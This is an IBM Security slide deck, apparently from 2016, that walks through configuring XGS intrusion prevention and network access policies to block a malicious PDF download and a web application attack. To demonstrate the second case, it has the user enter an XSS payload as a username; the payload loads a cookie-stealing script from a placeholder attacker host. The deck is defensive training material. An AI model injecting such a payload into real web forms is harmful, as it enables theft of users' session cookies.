Configuring an Intrusion Prevention Policy for blocking ... · © 2015 IBM Corporation Jenson John, Padmaja Deshmukh L2 Technical Engineer IBM Security Systems February 22, 2016 Configuring

© 2015 IBM Corporation

Jenson John, Padmaja DeshmukhL2 Technical EngineerIBM Security Systems

February 22, 2016

Configuring an Intrusion Prevention Policy for blocking malicious files and blocking web application attacks

2© 2015 IBM Corporation

Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block file-based attacks.

Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use cases


In this scenario, XGS blocks a malicious file when an end user attempts to download it from a vulnerable web server.

Use-case1: Topology


Accessing the Intrusion Prevention Policy

To navigate to the Intrusion Prevention Policy on the XGS LMI, click the Secure Policy Configuration link from the main menu and then click Intrusion Prevention Policy under the Security Policies.


Accessing and editing Default IPS object

Expand the left panel, select the Default IPS object. Right-click the Default IPS object and select Edit.


Editing IPS object


Enabling the Event Log

Add the Event Log object to Added Objects. Click Save Configuration and Deploy.


Accessing Network Access Policy

To navigate to the Network Access Policy, click the Secure Policy Configuration link from the main menu and then click Network Access Policy under the Security Policies.


Configuring a Network Access Rule Click the New button to open the Add Network Access Rule window. On the General Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to Accept.


Response Tab

In the Response Tab, you can add an Event Log Object.


Source Tab In the Source Tab, select Any (indicates: Any Source)


Destination Tab In the Destination Tab, select Any (indicates : Any Destination)


Application Tab

In the Application tab, select Any.


Inspection Tab

In the Inspection tab, add the Default IPS inspection object.

Note: You can attach inspection objects to network access policy rules in conjunction with other network objects to filter certain traffic or events.


Deploy Network Access Policy

After the rule is created, click on Save Configuration and deploy the NAP policy.


Downloading the malicious file


Viewing the IPS Events

To view the IPS events, go to Monitor Analysis and Diagnostics > Logs > select IPS Events


Log showing XGS detected and blocked malicious file

Under IPS Events > Pause Live Streaming, the U3D_Adobe_Memory_Corruption event is triggered on downloading the malicious PDF file.


View the IPS event details

Select the Event, and click on View Details to view more details.


● Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use-case: 2


In this scenario, XGS blocks a web application attack when an end user attempts to inject a malicious script into a vulnerable web server.

Use-case 2: Topology


Accessing Intrusion Prevention Policy

Navigating in the Local Management Interface: Click Secure, and then click Intrusion Prevention Policy.


In the IPS Objects pane, click New > Inspection > Intrusion Prevention


Response Tab• In the response tab, you can enable Event Log, capture connection and

capture packet.

• It also include configuring notifications about events through email, SNMP, and remote syslog alerts.


New IPS object “Demo-WAP” is listed under the Inspection object


Adding filters


Enabling some of the Web Application Protection Signatures and setting them to block


Navigating in the Local Management Interface: Click Secure, and then click Network Access Policy.

Accessing Network Access Policy


Configuring a Network Access Rule

Click the New button to add a new Network Access Rule.


General Configuration Tab


Response Tab


Source Tab


Destination Tab


Application Tab


Inspection Tab


Schedule Tab


Tip : Place specific rules before general ones because rules are applied in the order they are listed in the Network Access Policy page.


Simulating a Web Application Attack

Launch a browser & access the vulnerable web server- www.testfire.net Click the Sign In link :

http://www.testfire.net/

http://www.testfire.net/


Adding a script to the Sign In page

For username, enter the above script and for password, enter any string. Click Login

<script src=”http://hackerx.org/stealcookie.js”></script>


XGS blocks the access


Viewing the IPS Events

To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log. Select the IPS Events tab.


Event generated by XGS for associated attack


Event Detail


References

Configuring Network Access Policy:https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_about_acl_rules.htm

Configuring Intrusion Prevention Policy:https://www-

01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_intrusion_prevention_policy_container.htm

Knowledge center for XGS:https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/alps_collateral/alps_dochome_stg.htm

X-Force Virtual Patch Protection Levels for XGS and GX:http://www-01.ibm.com/support/docview.wss?uid=swg21701441


Questions ?


Chat with IBM Technical Support


Subscribe to our Channel

https://www.youtube.com/user/IBMSecuritySupport

© Copyright IBM Corporation 2015. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

THANK YOUwww.ibm.com/security

Documents

Configuring an Intrusion Prevention Policy for blocking ... · © 2015 IBM Corporation Jenson John, Padmaja Deshmukh L2 Technical Engineer IBM Security Systems February 22, 2016 Configuring